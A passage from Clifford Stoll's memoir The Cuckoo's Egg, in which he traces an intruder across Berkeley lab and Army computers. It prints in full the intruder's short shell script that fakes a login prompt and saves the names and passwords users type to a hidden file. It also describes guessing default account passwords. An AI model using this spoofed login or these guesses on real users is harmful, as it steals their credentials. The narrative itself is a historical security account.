- Home
- Clifford Stoll
Cuckoo's Egg Page 6
Cuckoo's Egg Read online
Page 6
“Who are you? How do I know you’re not trying to break in?”
After a few minutes of disbelief, he asked for my phone number, hung up, and called me back. Here’s someone that doesn’t trust strangers. Or did he call me back on a secure phone line?
“Bad news,” I said. “I think I saw someone breaking into your system.”
“Aw, hell—that son of a bitch, Hunter?”
“Yeah. How’d you know?”
“I’ve seen his ass before.”
Chuck McNatt explained through a thick Alabama drawl that the Army’s Redstone Missile Arsenal kept track of its supplies on a couple of Unix computers. To get orders processed quickly, they’d hooked up to Chuck’s computer at the Anniston Depot. Most of their traffic was news updates—not many people logged in remotely.
One Saturday morning, to escape the August heat, Chuck had gone into work and checked the users on his system. Someone named Hunter was using up an enormous amount of computing time. Surprised to see anyone on a Saturday, Chuck had flashed a message on Hunter’s screen, saying “Hey! Identify yourself!”
The mysterious Hunter typed back, “Who do you think I am?”
Chuck wasn’t that gullible. He sent another message, “Identify yourself now or I’ll knock you off the system!”
Back came Hunter’s reply, “I cannot answer.”
“So I bumped him off the machine,” Chuck said. “We called the FBI, but they didn’t give a damn. So we talked CID into tracing every damn connection coming in on our phone lines.”
“What’s the CID—Chestnut Inspection Department?”
“Be serious,” Chuck said. “The CID’s the Army’s cops. The criminal investigation division. But they’re not doin’ much.”
“No classified material lost, huh?”
The FBI in Montgomery, Alabama, told Chuck about the same story as Oakland had told me. They’d investigate when a million dollars disappeared. Until then, don’t bother ’em. Computer crimes weren’t sexy.
“Who’d you find?”
“The weirdest thing,” Chuck continued. “I caught Hunter sneaking into my computer two or three more times, but my telephone recorders didn’t show a thing.”
“Betcha I know why. He’s been coming in through your back door. Your Milnet connection. Some hacker’s been breaking into our system, and he got into your computer this morning.”
Chuck cursed—he’d missed the three-minute connection. He had set traps on all his telephone lines, but hadn’t thought to watch his network links.
“We’re trying to find out who’s hacking our system,” I said. “We figure he’s a student here in Berkeley, and we’re gearing up to track him down. Our first trace points to Oakland or Berkeley.”
“Well, I know how you feel. We all suspect it’s a student here in Alabama,” Chuck said. “We thought about closing up, but we’re out to git him. I’d rather see him behind bars than behind a terminal.”
For the first time, I worried for this hacker’s welfare. If the Army caught the guy, he’d have a rough time.
“Hey, Chuck, have I got a kicker for you. Betcha this guy’s super-user on your system.”
“Naw. He might have stolen an account, but no way he’d get to be super-user. We’re an Army base, not some goofball college.”
I let the swipe at Berkeley pass. “He went looking for your Gnu-Emacs move-mail file.”
“Yeah. So what?”
“What do you know about the nesting habits of cuckoos?” I explained the workings of the Gnu-Emacs security hole.
Chuck was taken aback. “You mean we’ve had this hole since White Sands sent us this Gnu file?” Chuck whistled. “I wonder how long he’s been poking around.” He understood the hole and the implications.
The hacker listed files at the Anniston system. Judging from the dates of these files, he’d been in Anniston’s computers since early June. For four months, an illegitimate system manager used an Alabama Army computer. Yet he’d been discovered by accident, not through some logic bomb or lost information.
No obvious damage.
Looking closely at the morning’s printout, I saw that the hacker had executed the change password command. On the Anniston computer, he had changed Hunter’s password to be “Hedges.” A clue at last: of zillions of possible passwords, he’d chosen Hedges. Hedges Hunter? Hunter Hedges? A hedge hunter? Time to flip through the H’s in the Berkeley telephone book.
Three phone calls to H. Hunter turned up Harold, Heidi, and Hilda Hunter. “Hi, are you interested in a free subscription to Computer Reviews?” No dice. None of them said they cared about computers.
What does a physics lab in Berkeley have in common with an army depot in Anniston, Alabama? You couldn’t find more politically opposite locations: a good-old-boy Army base and a radical hippie town. Yet technically, we shared quite a bit. Both our computers ran Unix and connected through the Milnet network.
But wait—Anniston’s system ran AT&T Unix, not the Berkeley dialect. If I believed Dave Cleveland, then the hacker was at home on Anniston’s system. Might it be a Southern hacker?
I couldn’t stand the sterile, fluorescent lighted halls of the lab anymore, so I went outside to look at the panoramic view of the Bay Area below me. The Berkeley campus lay directly beneath my laboratory. Once the home of the free speech movement and antiwar protests, the campus is still known for its wild politics and ethnic diversity. If I were a little closer, I could probably hear the Young Republicans baiting the Socialist Workers, while the Chinese Club looked on in amazement.
Smoky coffeehouses crowded next to the campus, where haggard grad students scribbled their theses, fueled by espresso. At nearby ice cream shops, giggling sorority girls mingled with punks in black leather and spiked hair. Best of all—Berkeley’s bookstores.
From the front of the lab, I could look farther south, to the pleasant streets of north Oakland, where we lived. There I shared an old bungalow with an assortment of zany roommates. Across the bay, shrouded by fog, was San Francisco—Oz.
Three years ago, Martha had moved here to study law and I’d tagged along. She’d been worth crossing the country for. She was a damned good hiking partner and caver. I first met her when I fell thirty feet inside a cave; she came to the rescue, rapelling down to where I lay incapacitated by a bad sprain and utter infatuation. My injuries healed, thanks to her chicken soup; my affection for the smart-aleck kid who climbed rocks so fearlessly ripened into love.
Now we lived together. She studied law, and actually enjoyed it. She didn’t want to be a lawyer, but a legal philosopher. Somehow, she had time left over to practice aikido, a Japanese martial art, and often came home bruised but grinning. She cooked, gardened, pieced quilts, did carpentry, and made stained glass windows. For all our zaniness, we wallowed in disgustingly wholesome domestic bliss.
I bicycled home and told Martha about the Alabama break-in, speculating about who might be behind it.
“So there’s technocratic vandals,” she said. “What else is new?”
“That’s news in itself. Technicians now have incredible power to control information and communication,” I said.
“So what? Somebody’s always had control over information, and others have always tried to steal it. Read Machiavelli. As technology changes, sneakiness finds new expressions.”
Martha was still giving me a history lesson when Claudia bustled in, complaining about her fifth graders. Life in Berkeley usually includes a roommate or two. Claudia was ours, and a perfect one at that. She was generous and cheerful, eager to share her life, her music, and her kitchen gadgets with us. She was a professional violinist eking out a living by playing in two symphony orchestras and a chamber music trio, and giving lessons to kids.
Claudia was seldom still or quiet. In her few moments between jobs, she simultaneously cooked meals, talked on the phone, and played with her dog.
At first I listened, but soon her voice became like the background chirp of a parakeet while
I worried about how malicious this hacker might be. While I’m at home, how do I know what he’s up to?
Claudia knew how to take my mind off the hacker: she brought home a video, Plan 9 from Outer Space—aliens in tinfoil flying saucers drag vampires from graves.
Wednesday, September 17, was a drizzly Berkeley day. As the only California couple without a car, Martha and I had to bicycle through the rain. On my way into the lab, I visited the switchyard, to check for any visits by the hacker. Water dripped off my sopping hair onto the printout, smudging the ink on the paper.
Sometime during the night, someone had connected to our computer, and methodically tried to log into the Unix-4 computer. First they tried to log into the Guest account, using the password “Guest.” Then they tried the Visitor account, with password “Visitor”; then accounts Root, System, Manager, Service, and Sysop. After a couple of minutes, the attacker left.
Could this be a different hacker? This guy didn’t even try valid accounts like Sventek or Stoll. He simply tried obvious account names and simple passwords. I wondered how often such an attack might succeed.
Not often—with six-letter passwords a hacker had a better chance of winning the lottery than randomly guessing a particular password. Since the computer hangs up after a few log-in failures, the attacker would need all night to try even a few hundred possible passwords. No, a hacker couldn’t magically enter my system. He’d need to know at least one password.
By 12:29, most of my clothes had dried off, though my sneakers still squished. I was part way into a soggy bagel, and most of the way through an astronomy article about physics of the icy satellites of Jupiter. My terminal beeped. Trouble in the switchyard. A quick (though squeaky) trot down the hallway let me watch the hacker connect into our system as Sventek.
Again the adrenaline rush: I called Tymnet and quickly found Ron Vivier. Ron started the trace, and I huddled over the Decwriter, which now tapped out the hacker’s commands.
The hacker wasted no time. He issued commands to show all the active users and any background jobs running. He then fired up Kermit.
Named after the Muppet hero, Kermit is the universal language for connecting computers together. In 1980, Frank da Cruz of Columbia University needed to send data to a number of different computers. Instead of writing five different, incompatible programs, he created a single standard to exchange files between any systems. Kermit’s become the Esperanto of computers.
Absentmindedly chewing on a bagel, I watched as the hacker used Kermit to transfer a short program into our Unix computer. Line by line, faithful Kermit reassembled it, and soon I could read the following program:
echo -n “WELCOME TO THE LBL UNIX-4 COMPUTER”
echo -n “PLEASE LOG IN NOW”
echo -n “LOGIN:”
read account_name
echo -n “ENTER YOUR PASSWORD:”
(stty -echo;
read password;
stty echo;
echo “ ”;
echo $account_name $password » /tmp/.pub)
echo “SORRY, TRY AGAIN.”
Yikes! Now here was a strange program! This program, when installed in our computer, would prompt a user to enter his name and password. An ordinary user who ran this program would see on his screen:
WELCOME TO THE LBL UNIX-4 COMPUTER
PLEASE LOGIN NOW
Login:
His terminal would then wait until he entered his account name. After he typed his name, the system responds:
ENTER YOUR PASSWORD:
And he’d naturally type in his password. The program then stashes the unlucky user’s name and password into a file, tells the user,
“SORRY, TRY AGAIN”
and then disappears.
Thinking they’ve mistyped their passwords, most people will just try to log in again. By then, their password will already have been stolen.
Four thousand years ago, the city of Troy fell when Greek soldiers snuck in, hidden inside the Trojan horse.
Deliver a gift that looks attractive, yet steals the very key to your security. Sharpened over the millennia, this technique still works against everyone except the truly paranoid.
The hacker’s Trojan horse program collected passwords. Our visitor wanted our passwords badly enough to risk getting caught installing a program that was bound to be detected.
Was this program a Trojan horse? Maybe I should call it a mockingbird: a false program that sounded like the real thing. I didn’t have time to figure out the difference—within a minute, he was bound to install his program in the systems area, and start it running. What should I do? To disable it would show him that I was watching him. Yet doing nothing would give him a new password every time someone logged in.
But legitimate super-users have power, too. Before the hacker could run his program, I changed one line in it, making it look like he’d made a trivial error. Then I diddled a couple system parameters to slow down the system. Slow enough that the hacker would need ten minutes to rebuild his program. Enough time to let us respond to this new attack.
I shouted down the hall for Guru Dave.
“What do you feed a Trojan horse?”
Dave came running. We shifted the computer into high speed, and prepared a fodder of bogus accounts and false passwords.
But our panic wasn’t necessary. The hacker rebuilt his Trojan horse, but didn’t install it properly. Dave instantly realized that it had been placed in the wrong directory. His Trojan horse would be happy in standard AT&T Unix, but couldn’t cavort in the fields of Berkeley Unix.
Dave grinned. “I won’t say, ‘I told you so,’ but we’re watching someone who’s never been to California. Every Unix jockey on the West Coast would use Berkeley style commands, yet your hacker’s still using AT&T Unix.”
Dave descended from his tower to explain what he meant. “The spelling of his commands is different from Berkeley Unix. But so is the very feel of the program. Kinda like how you can tell that a writer is British rather than American. Sure, you’ll see words like ‘colour’ and ‘defence,’ but you can feel the style difference as well.”
“So what’s the difference?” I asked.
Dave sneered, “The hacker used the command, ‘read’ to get keyboard data. Any civilized programmer would use the ‘set’ command.” For Dave, civilized computers spoke Berkeley Unix. All others were uncouth.
The hacker didn’t realize this. Confident that he’d put his Trojan horse in the right pasture, he ran it as a background process, and logged off. Before he disconnected, Ron Vivier had traced the hacker through Tymnet’s network, and into an Oakland, California, telephone line. The dust hadn’t yet settled on our court order, so we couldn’t start the phone trace.
The hacker had left, but his Trojan horse stayed behind, running as a background task. As Dave predicted, it collected no passwords, for it had been installed in a place that wasn’t referenced during log-in. Sure enough, twenty minutes later, the hacker reappeared, searched for a collection of passwords, and must have been disappointed to find his program had failed.
“Look, Dave, the poor guy needs your help,” I said.
“Right. Should we send him some electronic mail telling him how to write a Trojan horse program that works?” Dave replied.
“He’s got the basics right—imitating our log-in sequence, asking for the username and password, then storing the stolen information. All he needs is a few lessons in Berkeley Unix.”
Wayne stopped by to watch the hacker flounder. “Aw, what do you expect? There’s just too many varieties of Unix. Next time make it easier on those inept hackers, and give them Digital’s VMS operating system. It might not be easier to hack, but at least it’s standardized. IOTTMCO.” Intuitively obvious to the most casual observer.
Wayne had a good point. The hacker’s Trojan horse attack had failed because the operating system wasn’t exactly what he was accustomed to. If everyone used the same version of the same operating system, a singl
e security hole would let hackers into all the computers. Instead, there’s a multitude of operating systems: Berkeley Unix, AT&T Unix, DEC’s VMS, IBM’s TSO, VM, DOS, even Macintoshes and Ataris. This variety of software meant that no single attack could succeed against all systems. Just like genetic diversity, which prevents an epidemic from wiping out a whole species at once, diversity in software is a good thing.
Dave and Wayne continued bickering as they left the switchyard. I hung around a few more minutes, reloading paper. At 1:30 P.M., the hacker reappeared; I was still adjusting the printer when he started typing.
This second session was predictable. Our visitor looked at his special file for passwords and found none. He listed his Trojan horse program and tested it a couple times. It didn’t work. Apparently, he didn’t have a Dave Cleveland for help. Obviously frustrated, he erased the file and logged off in a couple minutes.
But even though he’d been on for only a few minutes, Tymnet managed to trace him, again into Oakland. Ron Vivier, who’d traced Tymnet’s connections, apparently welcomed any emergency that might extricate him from a meeting, so he jumped when I called. If we could only get the phone company to continue the trace, we could wrap up everything in a couple days.
Dave felt he could exclude anyone coming from the West Coast. Chuck in Anniston suspected a hacker from Alabama. Tymnet’s traces pointed to Oakland.
Me? I didn’t know.
Our Tymnet traces reached into Oakland, at various times the home of Jack London, Ed Meese, and Gertrude Stein. A twenty-minute bike ride from the Berkeley campus led to the Oakland Paramount Theater, with its sublime art-deco architecture and eye-popping murals. A few blocks away, in the basement of an ugly modern building, Tymnet rents space for fifty dialup modems. Ron Vivier had traced the hacker from our lab into this bank of modems. Now it was my local telephone company’s turn.
A two-inch-thick cable runs under Broadway, connecting Tymnet’s modems to an unmarked, windowless building. There, Pacific Bell’s Franklin office houses an electronic switch to handle ten thousand telephone lines in area code 415 with the prefix 430. Tymnet leases fifty of these lines.